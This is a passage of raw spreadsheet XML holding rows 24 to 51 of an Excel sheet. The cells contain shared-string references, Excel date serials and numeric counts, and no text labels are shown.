      <c r="E24" t="s">
        <v>377</v>
      </c>
      <c r="F24">
        <v>102</v>
      </c>
      <c r="G24" t="s">
        <v>378</v>
      </c>
      <c r="H24" t="s">
        <v>379</v>
      </c>
      <c r="I24" t="s">
        <v>75</v>
      </c>
      <c r="J24" t="s">
        <v>236</v>
      </c>
      <c r="K24" t="s">
        <v>21</v>
      </c>
      <c r="L24" t="s">
        <v>77</v>
      </c>
      <c r="M24" t="s">
        <v>236</v>
      </c>
      <c r="O24" t="s">
        <v>380</v>
      </c>
      <c r="Q24" t="s">
        <v>3498</v>
      </c>
      <c r="R24">
        <v>3</v>
      </c>
      <c r="S24">
        <v>12</v>
      </c>
      <c r="T24">
        <v>57</v>
      </c>
      <c r="U24">
        <v>41</v>
      </c>
      <c r="W24" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="25" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A25" t="s">
        <v>4</v>
      </c>
      <c r="B25">
        <v>44494.933607407409</v>
      </c>
      <c r="C25" t="s">
        <v>376</v>
      </c>
      <c r="D25">
        <v>132</v>
      </c>
      <c r="E25" t="s">
        <v>382</v>
      </c>
      <c r="F25">
        <v>120</v>
      </c>
      <c r="G25" t="s">
        <v>383</v>
      </c>
      <c r="H25" t="s">
        <v>384</v>
      </c>
      <c r="I25" t="s">
        <v>75</v>
      </c>
      <c r="J25" t="s">
        <v>236</v>
      </c>
      <c r="K25" t="s">
        <v>21</v>
      </c>
      <c r="L25" t="s">
        <v>77</v>
      </c>
      <c r="M25" t="s">
        <v>236</v>
      </c>
      <c r="O25" t="s">
        <v>385</v>
      </c>
      <c r="Q25" t="s">
        <v>3498</v>
      </c>
      <c r="S25">
        <v>1</v>
      </c>
      <c r="T25">
        <v>1</v>
      </c>
      <c r="V25">
        <v>2</v>
      </c>
      <c r="W25" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="26" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A26" t="s">
        <v>4</v>
      </c>
      <c r="B26">
        <v>44405.538274456019</v>
      </c>
      <c r="C26" t="s">
        <v>376</v>
      </c>
      <c r="D26">
        <v>132</v>
      </c>
      <c r="E26" t="s">
        <v>386</v>
      </c>
      <c r="F26">
        <v>120</v>
      </c>
      <c r="G26" t="s">
        <v>387</v>
      </c>
      <c r="H26" t="s">
        <v>388</v>
      </c>
      <c r="I26" t="s">
        <v>75</v>
      </c>
      <c r="J26" t="s">
        <v>236</v>
      </c>
      <c r="K26" t="s">
        <v>21</v>
      </c>
      <c r="L26" t="s">
        <v>77</v>
      </c>
      <c r="M26" t="s">
        <v>236</v>
      </c>
      <c r="O26" t="s">
        <v>389</v>
      </c>
      <c r="Q26" t="s">
        <v>3498</v>
      </c>
      <c r="W26" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="27" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A27" t="s">
        <v>4</v>
      </c>
      <c r="B27">
        <v>44336.619851631942</v>
      </c>
      <c r="C27" t="s">
        <v>397</v>
      </c>
      <c r="D27">
        <v>100</v>
      </c>
      <c r="E27" t="s">
        <v>398</v>
      </c>
      <c r="F27">
        <v>100</v>
      </c>
      <c r="G27" t="s">
        <v>399</v>
      </c>
      <c r="H27" t="s">
        <v>400</v>
      </c>
      <c r="I27" t="s">
        <v>172</v>
      </c>
      <c r="J27" t="s">
        <v>173</v>
      </c>
      <c r="K27" t="s">
        <v>13</v>
      </c>
      <c r="L27" t="s">
        <v>83</v>
      </c>
      <c r="M27" t="s">
        <v>72</v>
      </c>
      <c r="N27" t="s">
        <v>174</v>
      </c>
      <c r="Q27" t="s">
        <v>401</v>
      </c>
      <c r="R27">
        <v>106853</v>
      </c>
      <c r="S27">
        <v>142489</v>
      </c>
      <c r="T27">
        <v>192460</v>
      </c>
      <c r="U27">
        <v>201563</v>
      </c>
      <c r="V27">
        <v>202867</v>
      </c>
      <c r="W27" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="28" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A28" t="s">
        <v>4</v>
      </c>
      <c r="B28">
        <v>44415.434837361114</v>
      </c>
      <c r="C28" t="s">
        <v>402</v>
      </c>
      <c r="D28">
        <v>101</v>
      </c>
      <c r="E28" t="s">
        <v>403</v>
      </c>
      <c r="F28">
        <v>101</v>
      </c>
      <c r="G28" t="s">
        <v>404</v>
      </c>
      <c r="H28" t="s">
        <v>405</v>
      </c>
      <c r="I28" t="s">
        <v>172</v>
      </c>
      <c r="J28" t="s">
        <v>173</v>
      </c>
      <c r="K28" t="s">
        <v>13</v>
      </c>
      <c r="L28" t="s">
        <v>77</v>
      </c>
      <c r="M28" t="s">
        <v>406</v>
      </c>
      <c r="N28" t="s">
        <v>407</v>
      </c>
      <c r="Q28" t="s">
        <v>3499</v>
      </c>
      <c r="R28">
        <v>26999459</v>
      </c>
      <c r="S28">
        <v>87794372</v>
      </c>
      <c r="T28">
        <v>87155684</v>
      </c>
      <c r="U28">
        <v>88695635</v>
      </c>
      <c r="V28">
        <v>103033730</v>
      </c>
      <c r="W28" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="29" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A29" t="s">
        <v>4</v>
      </c>
      <c r="B29">
        <v>44473.722917141204</v>
      </c>
      <c r="C29" t="s">
        <v>409</v>
      </c>
      <c r="D29">
        <v>111</v>
      </c>
      <c r="E29" t="s">
        <v>410</v>
      </c>
      <c r="F29">
        <v>102</v>
      </c>
      <c r="G29" t="s">
        <v>411</v>
      </c>
      <c r="H29" t="s">
        <v>412</v>
      </c>
      <c r="I29" t="s">
        <v>172</v>
      </c>
      <c r="J29" t="s">
        <v>173</v>
      </c>
      <c r="K29" t="s">
        <v>13</v>
      </c>
      <c r="L29" t="s">
        <v>77</v>
      </c>
      <c r="M29" t="s">
        <v>406</v>
      </c>
      <c r="N29" t="s">
        <v>407</v>
      </c>
      <c r="Q29" t="s">
        <v>3500</v>
      </c>
      <c r="R29">
        <v>14794</v>
      </c>
      <c r="S29">
        <v>14917</v>
      </c>
      <c r="T29">
        <v>9655</v>
      </c>
      <c r="U29">
        <v>9689</v>
      </c>
      <c r="V29">
        <v>18352</v>
      </c>
      <c r="W29" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="30" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A30" t="s">
        <v>4</v>
      </c>
      <c r="B30">
        <v>44473.722917106483</v>
      </c>
      <c r="C30" t="s">
        <v>409</v>
      </c>
      <c r="D30">
        <v>111</v>
      </c>
      <c r="E30" t="s">
        <v>414</v>
      </c>
      <c r="F30">
        <v>102</v>
      </c>
      <c r="G30" t="s">
        <v>415</v>
      </c>
      <c r="H30" t="s">
        <v>416</v>
      </c>
      <c r="I30" t="s">
        <v>172</v>
      </c>
      <c r="J30" t="s">
        <v>173</v>
      </c>
      <c r="K30" t="s">
        <v>13</v>
      </c>
      <c r="L30" t="s">
        <v>77</v>
      </c>
      <c r="M30" t="s">
        <v>406</v>
      </c>
      <c r="N30" t="s">
        <v>407</v>
      </c>
      <c r="Q30" t="s">
        <v>3500</v>
      </c>
      <c r="R30">
        <v>11994</v>
      </c>
      <c r="S30">
        <v>11289</v>
      </c>
      <c r="T30">
        <v>9665</v>
      </c>
      <c r="U30">
        <v>8328</v>
      </c>
      <c r="V30">
        <v>12524</v>
      </c>
      <c r="W30" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="31" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A31" t="s">
        <v>4</v>
      </c>
      <c r="B31">
        <v>44473.722917129628</v>
      </c>
      <c r="C31" t="s">
        <v>409</v>
      </c>
      <c r="D31">
        <v>111</v>
      </c>
      <c r="E31" t="s">
        <v>417</v>
      </c>
      <c r="F31">
        <v>111</v>
      </c>
      <c r="G31" t="s">
        <v>418</v>
      </c>
      <c r="H31" t="s">
        <v>419</v>
      </c>
      <c r="I31" t="s">
        <v>172</v>
      </c>
      <c r="J31" t="s">
        <v>173</v>
      </c>
      <c r="K31" t="s">
        <v>13</v>
      </c>
      <c r="L31" t="s">
        <v>77</v>
      </c>
      <c r="M31" t="s">
        <v>406</v>
      </c>
      <c r="N31" t="s">
        <v>407</v>
      </c>
      <c r="Q31" t="s">
        <v>3500</v>
      </c>
      <c r="R31">
        <v>11922</v>
      </c>
      <c r="S31">
        <v>11141</v>
      </c>
      <c r="T31">
        <v>9679</v>
      </c>
      <c r="U31">
        <v>8338</v>
      </c>
      <c r="V31">
        <v>12483</v>
      </c>
      <c r="W31" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="32" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A32" t="s">
        <v>4</v>
      </c>
      <c r="B32">
        <v>44415.434837349538</v>
      </c>
      <c r="C32" t="s">
        <v>402</v>
      </c>
      <c r="D32">
        <v>101</v>
      </c>
      <c r="E32" t="s">
        <v>420</v>
      </c>
      <c r="F32">
        <v>101</v>
      </c>
      <c r="G32" t="s">
        <v>421</v>
      </c>
      <c r="H32" t="s">
        <v>422</v>
      </c>
      <c r="I32" t="s">
        <v>172</v>
      </c>
      <c r="J32" t="s">
        <v>173</v>
      </c>
      <c r="K32" t="s">
        <v>13</v>
      </c>
      <c r="L32" t="s">
        <v>77</v>
      </c>
      <c r="M32" t="s">
        <v>406</v>
      </c>
      <c r="N32" t="s">
        <v>407</v>
      </c>
      <c r="Q32" t="s">
        <v>3499</v>
      </c>
      <c r="R32">
        <v>5947313</v>
      </c>
      <c r="S32">
        <v>8781649</v>
      </c>
      <c r="T32">
        <v>12202895</v>
      </c>
      <c r="U32">
        <v>13129075</v>
      </c>
      <c r="V32">
        <v>14781955</v>
      </c>
      <c r="W32" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="33" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A33" t="s">
        <v>4</v>
      </c>
      <c r="B33">
        <v>44415.434867129632</v>
      </c>
      <c r="C33" t="s">
        <v>423</v>
      </c>
      <c r="D33">
        <v>101</v>
      </c>
      <c r="E33" t="s">
        <v>424</v>
      </c>
      <c r="F33">
        <v>101</v>
      </c>
      <c r="G33" t="s">
        <v>425</v>
      </c>
      <c r="H33" t="s">
        <v>426</v>
      </c>
      <c r="I33" t="s">
        <v>172</v>
      </c>
      <c r="J33" t="s">
        <v>173</v>
      </c>
      <c r="K33" t="s">
        <v>13</v>
      </c>
      <c r="L33" t="s">
        <v>77</v>
      </c>
      <c r="M33" t="s">
        <v>406</v>
      </c>
      <c r="N33" t="s">
        <v>407</v>
      </c>
      <c r="Q33" t="s">
        <v>3501</v>
      </c>
      <c r="R33">
        <v>368700</v>
      </c>
      <c r="S33">
        <v>538061</v>
      </c>
      <c r="T33">
        <v>711026</v>
      </c>
      <c r="U33">
        <v>763093</v>
      </c>
      <c r="V33">
        <v>836492</v>
      </c>
      <c r="W33" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="34" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A34" t="s">
        <v>4</v>
      </c>
      <c r="B34">
        <v>44415.434867094904</v>
      </c>
      <c r="C34" t="s">
        <v>423</v>
      </c>
      <c r="D34">
        <v>101</v>
      </c>
      <c r="E34" t="s">
        <v>428</v>
      </c>
      <c r="F34">
        <v>101</v>
      </c>
      <c r="G34" t="s">
        <v>429</v>
      </c>
      <c r="H34" t="s">
        <v>430</v>
      </c>
      <c r="I34" t="s">
        <v>172</v>
      </c>
      <c r="J34" t="s">
        <v>173</v>
      </c>
      <c r="K34" t="s">
        <v>13</v>
      </c>
      <c r="L34" t="s">
        <v>77</v>
      </c>
      <c r="M34" t="s">
        <v>406</v>
      </c>
      <c r="N34" t="s">
        <v>407</v>
      </c>
      <c r="Q34" t="s">
        <v>3501</v>
      </c>
      <c r="R34">
        <v>94559</v>
      </c>
      <c r="S34">
        <v>132745</v>
      </c>
      <c r="T34">
        <v>147349</v>
      </c>
      <c r="U34">
        <v>156828</v>
      </c>
      <c r="V34">
        <v>171153</v>
      </c>
      <c r="W34" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="35" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A35" t="s">
        <v>4</v>
      </c>
      <c r="B35">
        <v>44415.434867118056</v>
      </c>
      <c r="C35" t="s">
        <v>423</v>
      </c>
      <c r="D35">
        <v>101</v>
      </c>
      <c r="E35" t="s">
        <v>431</v>
      </c>
      <c r="F35">
        <v>101</v>
      </c>
      <c r="G35" t="s">
        <v>432</v>
      </c>
      <c r="H35" t="s">
        <v>433</v>
      </c>
      <c r="I35" t="s">
        <v>172</v>
      </c>
      <c r="J35" t="s">
        <v>173</v>
      </c>
      <c r="K35" t="s">
        <v>13</v>
      </c>
      <c r="L35" t="s">
        <v>77</v>
      </c>
      <c r="M35" t="s">
        <v>406</v>
      </c>
      <c r="N35" t="s">
        <v>407</v>
      </c>
      <c r="Q35" t="s">
        <v>3501</v>
      </c>
      <c r="R35">
        <v>149028</v>
      </c>
      <c r="S35">
        <v>229099</v>
      </c>
      <c r="T35">
        <v>272763</v>
      </c>
      <c r="U35">
        <v>327707</v>
      </c>
      <c r="V35">
        <v>370283</v>
      </c>
      <c r="W35" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="36" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A36" t="s">
        <v>4</v>
      </c>
      <c r="B36">
        <v>44510.422827465278</v>
      </c>
      <c r="C36" t="s">
        <v>434</v>
      </c>
      <c r="D36">
        <v>101</v>
      </c>
      <c r="E36" t="s">
        <v>435</v>
      </c>
      <c r="F36">
        <v>100</v>
      </c>
      <c r="G36" t="s">
        <v>436</v>
      </c>
      <c r="H36" t="s">
        <v>437</v>
      </c>
      <c r="I36" t="s">
        <v>156</v>
      </c>
      <c r="J36" t="s">
        <v>438</v>
      </c>
      <c r="K36" t="s">
        <v>21</v>
      </c>
      <c r="L36" t="s">
        <v>77</v>
      </c>
      <c r="M36" t="s">
        <v>158</v>
      </c>
      <c r="Q36" t="s">
        <v>3502</v>
      </c>
      <c r="U36">
        <v>73</v>
      </c>
      <c r="V36">
        <v>13435</v>
      </c>
      <c r="W36" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="37" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A37" t="s">
        <v>4</v>
      </c>
      <c r="B37">
        <v>44510.422827442133</v>
      </c>
      <c r="C37" t="s">
        <v>434</v>
      </c>
      <c r="D37">
        <v>101</v>
      </c>
      <c r="E37" t="s">
        <v>440</v>
      </c>
      <c r="F37">
        <v>101</v>
      </c>
      <c r="G37" t="s">
        <v>441</v>
      </c>
      <c r="H37" t="s">
        <v>442</v>
      </c>
      <c r="I37" t="s">
        <v>156</v>
      </c>
      <c r="J37" t="s">
        <v>438</v>
      </c>
      <c r="K37" t="s">
        <v>21</v>
      </c>
      <c r="L37" t="s">
        <v>77</v>
      </c>
      <c r="M37" t="s">
        <v>158</v>
      </c>
      <c r="Q37" t="s">
        <v>3502</v>
      </c>
      <c r="R37">
        <v>2980</v>
      </c>
      <c r="S37">
        <v>2782</v>
      </c>
      <c r="T37">
        <v>2423</v>
      </c>
      <c r="U37">
        <v>2123</v>
      </c>
      <c r="V37">
        <v>2366</v>
      </c>
      <c r="W37" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="38" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A38" t="s">
        <v>4</v>
      </c>
      <c r="B38">
        <v>44510.422827476854</v>
      </c>
      <c r="C38" t="s">
        <v>434</v>
      </c>
      <c r="D38">
        <v>101</v>
      </c>
      <c r="E38" t="s">
        <v>443</v>
      </c>
      <c r="F38">
        <v>101</v>
      </c>
      <c r="G38" t="s">
        <v>444</v>
      </c>
      <c r="H38" t="s">
        <v>445</v>
      </c>
      <c r="I38" t="s">
        <v>156</v>
      </c>
      <c r="J38" t="s">
        <v>438</v>
      </c>
      <c r="K38" t="s">
        <v>21</v>
      </c>
      <c r="L38" t="s">
        <v>77</v>
      </c>
      <c r="M38" t="s">
        <v>158</v>
      </c>
      <c r="Q38" t="s">
        <v>3502</v>
      </c>
      <c r="R38">
        <v>2979</v>
      </c>
      <c r="S38">
        <v>2783</v>
      </c>
      <c r="T38">
        <v>2312</v>
      </c>
      <c r="U38">
        <v>2126</v>
      </c>
      <c r="V38">
        <v>2382</v>
      </c>
      <c r="W38" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="39" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A39" t="s">
        <v>4</v>
      </c>
      <c r="B39">
        <v>44510.422827407405</v>
      </c>
      <c r="C39" t="s">
        <v>434</v>
      </c>
      <c r="D39">
        <v>101</v>
      </c>
      <c r="E39" t="s">
        <v>446</v>
      </c>
      <c r="F39">
        <v>101</v>
      </c>
      <c r="G39" t="s">
        <v>447</v>
      </c>
      <c r="H39" t="s">
        <v>448</v>
      </c>
      <c r="I39" t="s">
        <v>156</v>
      </c>
      <c r="J39" t="s">
        <v>438</v>
      </c>
      <c r="K39" t="s">
        <v>21</v>
      </c>
      <c r="L39" t="s">
        <v>77</v>
      </c>
      <c r="M39" t="s">
        <v>158</v>
      </c>
      <c r="Q39" t="s">
        <v>3502</v>
      </c>
      <c r="R39">
        <v>2982</v>
      </c>
      <c r="S39">
        <v>2777</v>
      </c>
      <c r="T39">
        <v>2430</v>
      </c>
      <c r="U39">
        <v>2128</v>
      </c>
      <c r="V39">
        <v>2373</v>
      </c>
      <c r="W39" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="40" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A40" t="s">
        <v>4</v>
      </c>
      <c r="B40">
        <v>44510.422827453702</v>
      </c>
      <c r="C40" t="s">
        <v>434</v>
      </c>
      <c r="D40">
        <v>101</v>
      </c>
      <c r="E40" t="s">
        <v>449</v>
      </c>
      <c r="F40">
        <v>101</v>
      </c>
      <c r="G40" t="s">
        <v>450</v>
      </c>
      <c r="H40" t="s">
        <v>451</v>
      </c>
      <c r="I40" t="s">
        <v>156</v>
      </c>
      <c r="J40" t="s">
        <v>438</v>
      </c>
      <c r="K40" t="s">
        <v>21</v>
      </c>
      <c r="L40" t="s">
        <v>77</v>
      </c>
      <c r="M40" t="s">
        <v>158</v>
      </c>
      <c r="Q40" t="s">
        <v>3502</v>
      </c>
      <c r="R40">
        <v>2982</v>
      </c>
      <c r="S40">
        <v>2780</v>
      </c>
      <c r="T40">
        <v>2424</v>
      </c>
      <c r="U40">
        <v>2132</v>
      </c>
      <c r="V40">
        <v>2346</v>
      </c>
      <c r="W40" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="41" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A41" t="s">
        <v>4</v>
      </c>
      <c r="B41">
        <v>44405.484184386572</v>
      </c>
      <c r="C41" t="s">
        <v>494</v>
      </c>
      <c r="D41">
        <v>101</v>
      </c>
      <c r="E41" t="s">
        <v>495</v>
      </c>
      <c r="F41">
        <v>101</v>
      </c>
      <c r="G41" t="s">
        <v>496</v>
      </c>
      <c r="H41" t="s">
        <v>497</v>
      </c>
      <c r="I41" t="s">
        <v>156</v>
      </c>
      <c r="J41" t="s">
        <v>226</v>
      </c>
      <c r="K41" t="s">
        <v>27</v>
      </c>
      <c r="L41" t="s">
        <v>77</v>
      </c>
      <c r="M41" t="s">
        <v>308</v>
      </c>
      <c r="N41" t="s">
        <v>309</v>
      </c>
      <c r="O41" t="s">
        <v>498</v>
      </c>
      <c r="Q41" t="s">
        <v>3503</v>
      </c>
      <c r="R41">
        <v>132</v>
      </c>
      <c r="S41">
        <v>108</v>
      </c>
      <c r="T41">
        <v>49</v>
      </c>
      <c r="U41">
        <v>25490</v>
      </c>
      <c r="V41">
        <v>23469</v>
      </c>
      <c r="W41" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="42" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A42" t="s">
        <v>4</v>
      </c>
      <c r="B42">
        <v>44078.504171817127</v>
      </c>
      <c r="C42" t="s">
        <v>468</v>
      </c>
      <c r="D42">
        <v>111</v>
      </c>
      <c r="E42" t="s">
        <v>500</v>
      </c>
      <c r="F42">
        <v>102</v>
      </c>
      <c r="G42" t="s">
        <v>501</v>
      </c>
      <c r="H42" t="s">
        <v>502</v>
      </c>
      <c r="I42" t="s">
        <v>156</v>
      </c>
      <c r="J42" t="s">
        <v>226</v>
      </c>
      <c r="K42" t="s">
        <v>27</v>
      </c>
      <c r="L42" t="s">
        <v>77</v>
      </c>
      <c r="M42" t="s">
        <v>308</v>
      </c>
      <c r="N42" t="s">
        <v>309</v>
      </c>
      <c r="O42" t="s">
        <v>503</v>
      </c>
      <c r="P42" t="s">
        <v>504</v>
      </c>
      <c r="Q42" t="s">
        <v>3504</v>
      </c>
      <c r="R42">
        <v>3959</v>
      </c>
      <c r="S42">
        <v>3054</v>
      </c>
      <c r="T42">
        <v>2848</v>
      </c>
      <c r="U42">
        <v>9892</v>
      </c>
      <c r="V42">
        <v>45574</v>
      </c>
      <c r="W42" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="43" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A43" t="s">
        <v>4</v>
      </c>
      <c r="B43">
        <v>43984.696897152775</v>
      </c>
      <c r="C43" t="s">
        <v>468</v>
      </c>
      <c r="D43">
        <v>111</v>
      </c>
      <c r="E43" t="s">
        <v>506</v>
      </c>
      <c r="F43">
        <v>100</v>
      </c>
      <c r="G43" t="s">
        <v>507</v>
      </c>
      <c r="H43" t="s">
        <v>508</v>
      </c>
      <c r="I43" t="s">
        <v>156</v>
      </c>
      <c r="J43" t="s">
        <v>438</v>
      </c>
      <c r="K43" t="s">
        <v>27</v>
      </c>
      <c r="L43" t="s">
        <v>77</v>
      </c>
      <c r="M43" t="s">
        <v>509</v>
      </c>
      <c r="N43" t="s">
        <v>510</v>
      </c>
      <c r="O43" t="s">
        <v>511</v>
      </c>
      <c r="P43" t="s">
        <v>512</v>
      </c>
      <c r="Q43" t="s">
        <v>3504</v>
      </c>
      <c r="W43" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="44" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A44" t="s">
        <v>4</v>
      </c>
      <c r="B44">
        <v>44433.528511863427</v>
      </c>
      <c r="C44" t="s">
        <v>518</v>
      </c>
      <c r="D44">
        <v>101</v>
      </c>
      <c r="E44" t="s">
        <v>519</v>
      </c>
      <c r="F44">
        <v>101</v>
      </c>
      <c r="G44" t="s">
        <v>520</v>
      </c>
      <c r="H44" t="s">
        <v>521</v>
      </c>
      <c r="I44" t="s">
        <v>172</v>
      </c>
      <c r="J44" t="s">
        <v>173</v>
      </c>
      <c r="K44" t="s">
        <v>13</v>
      </c>
      <c r="L44" t="s">
        <v>83</v>
      </c>
      <c r="M44" t="s">
        <v>72</v>
      </c>
      <c r="N44" t="s">
        <v>522</v>
      </c>
      <c r="Q44" t="s">
        <v>523</v>
      </c>
      <c r="R44">
        <v>168</v>
      </c>
      <c r="S44">
        <v>210</v>
      </c>
      <c r="T44">
        <v>173</v>
      </c>
      <c r="U44">
        <v>376</v>
      </c>
      <c r="V44">
        <v>2432</v>
      </c>
      <c r="W44" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="45" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A45" t="s">
        <v>4</v>
      </c>
      <c r="B45">
        <v>44121.405996990739</v>
      </c>
      <c r="C45" t="s">
        <v>532</v>
      </c>
      <c r="D45">
        <v>100</v>
      </c>
      <c r="E45" t="s">
        <v>533</v>
      </c>
      <c r="F45">
        <v>100</v>
      </c>
      <c r="G45" t="s">
        <v>534</v>
      </c>
      <c r="H45" t="s">
        <v>535</v>
      </c>
      <c r="I45" t="s">
        <v>268</v>
      </c>
      <c r="J45" t="s">
        <v>269</v>
      </c>
      <c r="K45" t="s">
        <v>10</v>
      </c>
      <c r="L45" t="s">
        <v>77</v>
      </c>
      <c r="M45" t="s">
        <v>290</v>
      </c>
      <c r="N45" t="s">
        <v>291</v>
      </c>
      <c r="O45" t="s">
        <v>536</v>
      </c>
      <c r="Q45" t="s">
        <v>537</v>
      </c>
      <c r="R45">
        <v>38</v>
      </c>
      <c r="S45">
        <v>20</v>
      </c>
      <c r="T45">
        <v>45</v>
      </c>
      <c r="U45">
        <v>16</v>
      </c>
      <c r="V45">
        <v>10</v>
      </c>
      <c r="W45" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="46" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A46" t="s">
        <v>4</v>
      </c>
      <c r="B46">
        <v>44428.640736527777</v>
      </c>
      <c r="C46" t="s">
        <v>538</v>
      </c>
      <c r="D46">
        <v>110</v>
      </c>
      <c r="E46" t="s">
        <v>539</v>
      </c>
      <c r="F46">
        <v>110</v>
      </c>
      <c r="G46" t="s">
        <v>540</v>
      </c>
      <c r="H46" t="s">
        <v>541</v>
      </c>
      <c r="I46" t="s">
        <v>185</v>
      </c>
      <c r="J46" t="s">
        <v>542</v>
      </c>
      <c r="K46" t="s">
        <v>16</v>
      </c>
      <c r="L46" t="s">
        <v>83</v>
      </c>
      <c r="M46" t="s">
        <v>72</v>
      </c>
      <c r="Q46" t="s">
        <v>3505</v>
      </c>
      <c r="R46">
        <v>10152</v>
      </c>
      <c r="S46">
        <v>50987</v>
      </c>
      <c r="T46">
        <v>85928</v>
      </c>
      <c r="U46">
        <v>71603</v>
      </c>
      <c r="V46">
        <v>69343</v>
      </c>
      <c r="W46" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="47" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A47" t="s">
        <v>4</v>
      </c>
      <c r="B47">
        <v>44495.711635706015</v>
      </c>
      <c r="C47" t="s">
        <v>551</v>
      </c>
      <c r="D47">
        <v>121</v>
      </c>
      <c r="E47" t="s">
        <v>552</v>
      </c>
      <c r="F47">
        <v>100</v>
      </c>
      <c r="G47" t="s">
        <v>553</v>
      </c>
      <c r="H47" t="s">
        <v>554</v>
      </c>
      <c r="I47" t="s">
        <v>75</v>
      </c>
      <c r="J47" t="s">
        <v>236</v>
      </c>
      <c r="K47" t="s">
        <v>21</v>
      </c>
      <c r="L47" t="s">
        <v>77</v>
      </c>
      <c r="M47" t="s">
        <v>236</v>
      </c>
      <c r="O47" t="s">
        <v>555</v>
      </c>
      <c r="Q47" t="s">
        <v>3506</v>
      </c>
      <c r="T47">
        <v>306</v>
      </c>
      <c r="U47">
        <v>59</v>
      </c>
      <c r="V47">
        <v>1639</v>
      </c>
      <c r="W47" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="48" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A48" t="s">
        <v>4</v>
      </c>
      <c r="B48">
        <v>44495.71163568287</v>
      </c>
      <c r="C48" t="s">
        <v>551</v>
      </c>
      <c r="D48">
        <v>121</v>
      </c>
      <c r="E48" t="s">
        <v>557</v>
      </c>
      <c r="F48">
        <v>112</v>
      </c>
      <c r="G48" t="s">
        <v>558</v>
      </c>
      <c r="H48" t="s">
        <v>559</v>
      </c>
      <c r="I48" t="s">
        <v>75</v>
      </c>
      <c r="J48" t="s">
        <v>236</v>
      </c>
      <c r="K48" t="s">
        <v>21</v>
      </c>
      <c r="L48" t="s">
        <v>77</v>
      </c>
      <c r="M48" t="s">
        <v>236</v>
      </c>
      <c r="O48" t="s">
        <v>560</v>
      </c>
      <c r="Q48" t="s">
        <v>3506</v>
      </c>
      <c r="R48">
        <v>15271</v>
      </c>
      <c r="S48">
        <v>16380</v>
      </c>
      <c r="T48">
        <v>19590</v>
      </c>
      <c r="U48">
        <v>14146</v>
      </c>
      <c r="V48">
        <v>38255</v>
      </c>
      <c r="W48" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="49" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A49" t="s">
        <v>4</v>
      </c>
      <c r="B49">
        <v>44714.405140173614</v>
      </c>
      <c r="C49" t="s">
        <v>1050</v>
      </c>
      <c r="D49">
        <v>100</v>
      </c>
      <c r="E49" t="s">
        <v>1051</v>
      </c>
      <c r="F49">
        <v>100</v>
      </c>
      <c r="G49" t="s">
        <v>1052</v>
      </c>
      <c r="H49" t="s">
        <v>1053</v>
      </c>
      <c r="Q49" t="s">
        <v>3507</v>
      </c>
      <c r="U49">
        <v>6</v>
      </c>
      <c r="W49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="50" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A50" t="s">
        <v>4</v>
      </c>
      <c r="B50">
        <v>44449.5567537963</v>
      </c>
      <c r="C50" t="s">
        <v>1055</v>
      </c>
      <c r="D50">
        <v>111</v>
      </c>
      <c r="E50" t="s">
        <v>1056</v>
      </c>
      <c r="F50">
        <v>111</v>
      </c>
      <c r="G50" t="s">
        <v>1057</v>
      </c>
      <c r="H50" t="s">
        <v>1058</v>
      </c>
      <c r="I50" t="s">
        <v>268</v>
      </c>
      <c r="J50" t="s">
        <v>566</v>
      </c>
      <c r="K50" t="s">
        <v>12</v>
      </c>
      <c r="L50" t="s">
        <v>77</v>
      </c>
      <c r="M50" t="s">
        <v>622</v>
      </c>
      <c r="N50" t="s">
        <v>623</v>
      </c>
      <c r="O50" t="s">
        <v>1059</v>
      </c>
      <c r="Q50" t="s">
        <v>3508</v>
      </c>
      <c r="R50">
        <v>2</v>
      </c>
      <c r="T50">
        <v>21669</v>
      </c>
      <c r="U50">
        <v>10135</v>
      </c>
      <c r="V50">
        <v>5891</v>
      </c>
      <c r="W50" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="51" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A51" t="s">
        <v>4</v>
      </c>
      <c r="B51">
        <v>44704.690373680554</v>
      </c>
